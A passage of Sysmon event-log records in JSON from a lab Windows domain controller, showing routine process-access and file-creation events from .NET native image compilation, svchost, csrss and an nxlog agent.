07:01:12.622","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010908E0C00}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.622\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010908E0C00}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.622","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010908E0C00}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.637\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010908E0C00}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.637","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010908E0C00}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:13.169\r\nProcessGuid: {E2A3D6B1-1338-5F25-0000-0010908E0C00}\r\nProcessId: 4756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1294-0\\Microsoft.VisualBasic.Activities.Compiler.dll\r\nCreationUtcTime: 2020-08-01 07:01:13.169","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:13.169","ProcessGuid":"{E2A3D6B1-1338-5F25-0000-0010908E0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1294-0\\Microsoft.VisualBasic.Activities.Compiler.dll","CreationUtcTime":"2020-08-01 07:01:13.169","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.215\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1339-5F25-0000-00105F920C00}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.215","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1339-5F25-0000-00105F920C00}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.215\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1339-5F25-0000-00105F920C00}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.215","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1339-5F25-0000-00105F920C00}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.231\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1339-5F25-0000-00105F920C00}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.231","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1339-5F25-0000-00105F920C00}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.559\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1339-5F25-0000-001072960C00}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.559","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1339-5F25-0000-001072960C00}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
